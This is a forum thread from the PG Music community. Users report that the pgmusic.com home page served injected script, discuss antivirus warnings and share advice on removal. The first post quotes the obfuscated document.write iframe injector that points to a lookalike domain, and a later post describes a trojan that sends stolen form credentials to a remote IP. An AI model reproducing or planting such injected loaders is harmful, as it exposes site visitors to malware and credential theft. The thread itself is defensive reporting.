Index
Next Thread
Print Thread
Go To
Page 1 of 2 1 2
Off-Topic
Grayson Offline OP
OP Offline
If you look at the source for the pgmusic.com home page, do you see the following line?:

<body ><script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>

Seems to be an obfuscated link to "microsotf.cn" which gave me a virus warning.

Just curious if this is something happening on my end or if it's actually in the page itself.

Thanks.

Off-Topic
Apprentice
Apprentice
yes i see it in the source.

are you the Grayson who works at PG?

DTuna
Off-Topic
Veteran
Veteran
When I read this from my Internet machine, I looked at the status of Avast!, my AV program. It was OFF. I don't even know how to do that. I am doing a Thorough Scan as I write. If there's something going on I'll have to reinstall an AV program on my DAW as I tend to stay logged into PG.

I have received several emails in the last few weeks under friends' names, but which were clearly the result of worms. All the messages have contained links to Chinese websites, most purporting to sell computers. I have gotten reports of illicit Chinese activity from other sources as well. To my mind, Chinese black-hat crackers (what folks erroneously call "hackers", who are really the white hats) are ve-ry busy these days. Make sure your AV programs are on and up to date.

R.

"My primary musical instrument is the personal computer."
Off-Topic
Enthusiast
Enthusiast
"Seems to be an obfuscated link to "microsotf.cn" which gave me a virus warning."

I'm getting the same thing when I try to go to the PGMusic home page through my SBC Yahoo browser. When I use just the MS Explorer browser, it doesn't happen. BTW, I am using Avast and Spybot.

Off-Topic
Veteran
Veteran
Yeah, Avast jumped right in as soon as looked at the homepage - needs attention!
I hate those javascript redirectors - they can be anywhere in the code; sometimes in places that are not even suppose to get read (like between the head and body tags), which explains why some browsers are more susceptible than others... but regardless of browser the problem is there.

Make your sound your own!
.. I do not work here, but the benefits are still awesome
Off-Topic
Expert
Expert
Avast caught mine right away when I went to the page this morning. Since then it has not come up again.

Off-Topic
C
Veteran
Veteran
C
It didn't make a lot of sense on my part, but I checked the homepage out. Avast worked for me also with a malware warning.

Don S.

Off-Topic
Grayson Offline OP
OP Offline
Thanks. I did send them email about it. Hopefully it'll get addressed ASAP.

BTW I don't work for PG Music, Mr Tuna.

Off-Topic
Journeyman
Journeyman
Hi
I'm also getting a trojan virus warning from Kaspersky when opening up PGMusic homepage what does this mean and is it being looked at.
The warning from Kaspersky is Trojan-Downloader.JS.Iframe.bjn

Brian Cadoret

Brian Cadoret
BIAB 2024 Pro with BIAB2023 UltraPAK build 1111. Samplitude Pro X4 Suite. Mixcraft 10.5 Pro Studio
Focusrite 2i2 Scarlett
Intel(R) Core(TM) i5-3470 CPU @ 3.20GHz 3.20 GHz
Installed RAM 8.00 GB

Off-Topic
Veteran
Veteran
I have heard that ridding a site of these types of infections is a tough task and time consuming so I assume they'll need a little time to resolve it.

I know of business sites that took a few weeks getting rid of it, only to get it again.
Keep your AV updated.
Use SpybotS&D too, as these redirectors hide from the Windows API and do not show up in antivirus scans or the running processes list. They can be tough to get rid of.

Here's a description of one such javascript redirecor -

After execution of e.g. 9129837.exe PWS.Small.bs installs a service (hide_evr2) and copies itself and the service file to the Windows directory. Additionally an autorun entry (ttool) is created which loads the 9129837.exe on every windows startup. The service affects that the two files and the autorun entry are hidden from the windows API, i.e. the user cannot see the files. If you visit webpages with forms like ebay or online banking pages the filled-in information like userid and password/pin are sent to http://81.95.147.107/cgi-bin/**** ADDITIONAL REMOVAL INSTRUCTION: Please reboot your PC in Safe Mode and perform another scan of Spybot - Search & Destroy to remove the remainings.

Having unfamiliar proccesses running like the above mentioned "9129837.exe " is not a good sign..

Off-Topic
Veteran
Veteran
My Avast! scan didn't show anything, but there was an info page somewhere that did list the 'microsotf.cn' thingie as an infection. More importantly, though, when I checked Avast! it was OFF again--not just that the scanners were disabled, but the program was not resident in memory. This is very concerning. I've started it again and will be keeping a close eye on it.

Edit: Followup: I can run a scan with Avast! but it does not run on Windows startup and will not stay in memory. I'm downloading AVG as I write.

So, we think this thing is a keystroke logger?

R.

"My primary musical instrument is the personal computer."
Off-Topic
C
Veteran
Veteran
C
Richard,

I had the same problem with Avast a while back. I deleted and then reinstalled it. So far, so good.

Don S.

Off-Topic
Veteran
Veteran
It is likely a keylogger - please go back and read my previous post - an antivirus will NOT find it
use SPYBOT quickly

I would disconnect from internet, (you may have to be on internet to install Spybot Search and Destroy) then scan, then scan again in safe mode as per Spybot instructions.

It is *probably* taking keylogging info and sending to a site somewhere... that is the purpose of these types of trojans

I am NOT trying to cause widespread panic, but it is a serious threat when one of these gets in, I have first and second hand experience removing this for others. Tend to your machine, especially if you have banking accounts or access to other web sites thru FTP on that machine.
If you watch when it first gets in you can see it connecting to .cn sites to update itself and start running...
I tested a couple infected sites and closely watched the results.
It gets into a web site through FTP by an infected admin, so all access should be closed and known clean backups used. Hopefully these exist on a source seperate from the main site.

A clean machine should also be used to reset all passwords for any admins to get access. Otherwise passwords are still held at the remote site for later reinfection.
It's an ugly ugly situation once it gets in.
I can list other sites infected right now, and have actually reported them to Google but they have not responded by associating a warning with these sites yet.

Off-Topic
Veteran
Veteran
As a side note - some versions are capable of adapting to the php used in forums, hopefully pgmusic is on top of this and the site is hosted seperately.

If PGMusic wants to check, look at the php script in the index.php files for added cryptic php code.
It will not be easy to see using the 'view source' but will easy to see using the source codes on the server.
Also trojans seems to like the 'include' folders and javascript folders.
This, however is much more rare than the current version that is infecting sites.

I suggest keeping a copy of install files for Spybot and Antivirus on a drive somewhere. I have seen these types of trojans block access to Avast, McAfee and Symantec, and probably others..

just trying to help with what I have seen.

Off-Topic
Apprentice
Apprentice
I'm running Linux and just safely saved the 25.8 KB malware download to disk. It's name is 955.pdf, so perhaps it it using an Acrobat exploit. I found another site that thinks their site was infected with it on 7/4.
(http://olegvolk.livejournal.com/628779.html)

If anyone needs the internal contents of the file, let me know. I will keep it a few days before deleting the file. For those using AVG antivirus protection, I ran an AVG scan on the file and AVG passed it as being OK, so be careful.

By the way, I urge all of you to only use Linux for surfing the internet.

JBlatz
Off-Topic
Veteran
Veteran
Linux is fine until you run into a virus designed to exploit Linux.
There are just about as many security updates for Linux as there are for Windows these days.. depending on the brand of Linux you want to run.

I use Linux Live CD's to get into infected systems and repair sometimes, so I know it has benefits for trojans designed to exploit windows, but it is by no means completely safe.

I would be interested in viewing the file contents, but I'd need to access it on a safer machine. Besides, a lot of mail servers will indeed catch it and stop delivery, as a lot of them are running linux also!
Congrats on outsmarting this one, and thanks for the extra efforts.
Other sites with the infection include dademoldinspectors and enviropro.net... among hundreds of others.
If you are interested in helping for these types of things, check out badwarebusters.org

Off-Topic
M
Mac Offline
Veteran
Veteran
M
Has the pgmusic homepage been fixed?

Off-Topic
Veteran
Veteran
I used the Live Help to ask. This is the reply I got:

"Jareth: Welcome to PG Music's live help. May we please have your first and last name to better assist you?
you: HI, this is Gary Curran. Do you know if anyone has found and removed the virus loader program from the main web page yet?
you: There is a thread in the Off Topic forum about it, several of us running Avast A/V have had Malware warnings about it.
Jareth: I'm currently asking our webmaster
Jareth: give me one moment
you: thank you, Jareth.
Jareth: webmaster says there is a script and that it is likely not dangerous - the contents are currently being analyzed and we will inform everyone as soon as we have reached a conclusion
you: okay. Thanks a lot.
you: have a great day.
Jareth: you're welcome, bye
you: END CHAT
Jareth: you too

Gary

I'm blessed watching God do what He does best. I've had a few rough years, and I'm still not back to where I want to be, but I'm on the way and things are looking far better now than what they were!
Off-Topic
Veteran
Veteran
JBlatz - what makes you think that the malware is called 955.pdf?
That appears to be a valid program/ format.
http://www.pdf995.com/

What I saw was a downloader script - a couple different warnings actually.. when I went to the home page.

Off-Topic
Journeyman
Journeyman
Hi
Just visited the PGMusic homepage and Kaspersky is NOT giving me trojan warnings anymore , I hope this is a good sign.

Brian Cadoret

Brian Cadoret
BIAB 2024 Pro with BIAB2023 UltraPAK build 1111. Samplitude Pro X4 Suite. Mixcraft 10.5 Pro Studio
Focusrite 2i2 Scarlett
Intel(R) Core(TM) i5-3470 CPU @ 3.20GHz 3.20 GHz
Installed RAM 8.00 GB

Previous Thread
Next Thread
Go To
Page 1 of 2 1 2

Link Copied to Clipboard
ChatPG

Ask sales and support questions about Band-in-a-Box using natural language.

ChatPG's knowledge base includes the full Band-in-a-Box User Manual and sales information from the website.

PG Music News
User Video: Next-Level AI Music Editing with ACE Studio and Band-in-a-Box®

The Bob Doyle Media YouTube channel is known for demonstrating how you can creatively incorporate AI into your projects - from your song projects to avatar building to face swapping, and more!

His latest video, Next-Level AI Music Editing with ACE Studio and Band-in-a-Box, he explains in detail how you can use the Melodist feature in Band-in-a-Box with ACE Studio. Follow along as he goes from "nothing" to "something" with his Band-in-a-Box MIDI Melodist track, using ACE Studio to turn it into a vocal track (or tracks, you'll see) by adding lyrics for those notes that will trigger some amazing AI vocals!

Watch: Next-Level AI Music Editing with ACE Studio and Band-in-a-Box

Band-in-a-Box® 2024 German for Windows is Here!

Band-in-a-Box® 2024 für Windows Deutsch ist verfügbar!

Wir waren fleißig und haben über 50 neue Funktionen und eine erstaunliche Sammlung neuer Inhalte hinzugefügt, darunter 222 RealTracks, neue RealStyles, MIDI SuperTracks, Instrumental Studies, "Songs with Vocals" Artist Performance Sets, abspielbare RealTracks Set 3, abspielbare RealDrums Set 2, zwei neue Sets von "RealDrums Stems", XPro Styles PAK 6, Xtra Styles PAK 17 und mehr!

Paket | Was ist Neu

Update Your PowerTracks Pro Audio 2024 Today!

Add updated printing options, enhanced tracks settings, smoother use of MGU and SGU (BB files) within PowerTracks, and more with the latest PowerTracks Pro Audio 2024 update!

Learn more about this free update for PowerTracks Pro Audio & download it at www.pgmusic.com/support_windows_pt.htm#2024_5

The Newest RealBand 2024 Update is Here!

The newest RealBand 2024 Build 5 update is now available!

Download and install this to your RealBand 2024 for updated print options, streamlined loading and saving of .SGU & MGU (BB) files, and to add a number of program adjustments that address user-reported bugs and concerns.

This free update is available to all RealBand 2024 users. To learn more about this update and download it, head to www.pgmusic.com/support.realband.htm#20245

The Band-in-a-Box® Flash Drive Backup Option

Today (April 5) is National Flash Drive Day!

Did you know... not only can you download your Band-in-a-Box® Pro, MegaPAK, or PlusPAK purchase - you can also choose to add a flash drive backup copy with the installation files for only $15? It even comes with a Band-in-a-Box® keychain!

For the larger Band-in-a-Box® packages (UltraPAK, UltraPAK+, Audiophile Edition), the hard drive backup copy is available for only $25. This will include a preinstalled and ready to use program, along with your installation files.

Backup copies are offered during the checkout process on our website.

Already purchased your e-delivery version, and now you wish you had a backup copy? It's not too late! If your purchase was for the current version of Band-in-a-Box®, you can still reach out to our team directly to place your backup copy order!

Note: the Band-in-a-Box® keychain is only included with flash drive backup copies, and cannot be purchased separately.

Handy flash drive tip: Always try plugging in a USB device the wrong way first? If your flash drive (or other USB plug) doesn't have a symbol to indicate which way is up, look for the side with a seam on the metal connector (it only has a line across one side) - that's the side that either faces down or to the left, depending on your port placement.

Update your Band-in-a-Box® 2024 for Windows® Today!

Update your Band-in-a-Box® 2024 for Windows for free with build 1111!

With this update, there's more control when saving images from the Print Preview window, we've added defaults to the MultiPicker for sorting and font size, updated printing options, updated RealTracks and other content, and addressed user-reported issues with the StylePicker, MIDI Soloists, key signature changes, and more!

Learn more about this free update for Band-in-a-Box® 2024 for Windows at www.pgmusic.com/support_windowsupdates.htm#1111

Band-in-a-Box® 2024 Review: 4.75 out of 5 Stars!

If you're looking for a in-depth review of the newest Band-in-a-Box® 2024 for Windows version, you'll definitely find it with Sound-Guy's latest review, Band-in-a-Box® 2024 for Windows Review: Incredible new capabilities to experiment, compose, arrange and mix songs.

A few excerpts:
"The Tracks view is possibly the single most powerful addition in 2024 and opens up a new way to edit and generate accompaniments. Combined with the new MultiPicker Library Window, it makes BIAB nearly perfect as an 'intelligent' composer/arranger program."

"MIDI SuperTracks partial generation showing six variations – each time the section is generated it can be instantly auditioned, re-generated or backed out to a previous generation – and you can do this with any track type. This is MAJOR! This takes musical experimentation and honing an arrangement to a new level, and faster than ever."

"Band in a Box continues to be an expansive musical tool-set for both novice and experienced musicians to experiment, compose, arrange and mix songs, as well as an extensive educational resource. It is huge, with hundreds of functions, more than any one person is likely to ever use. Yet, so is any DAW that I have used. BIAB can do some things that no DAW does, and this year BIAB has more DAW-like functions than ever."

Forum Statistics
Forums66
Topics81,643
Posts735,394
Members38,525
Most Online2,537
Jan 19th, 2020
Newest Members
theyearofjess, OlvaJownDay, Tranner Track, Ely Bass, Barking
38,525 Registered Users
Top Posters(30 Days)
MarioD 183
DC Ron 101
dcuny 89
rsdean 71
Today's Birthdays
There are no members with birthdays on this day.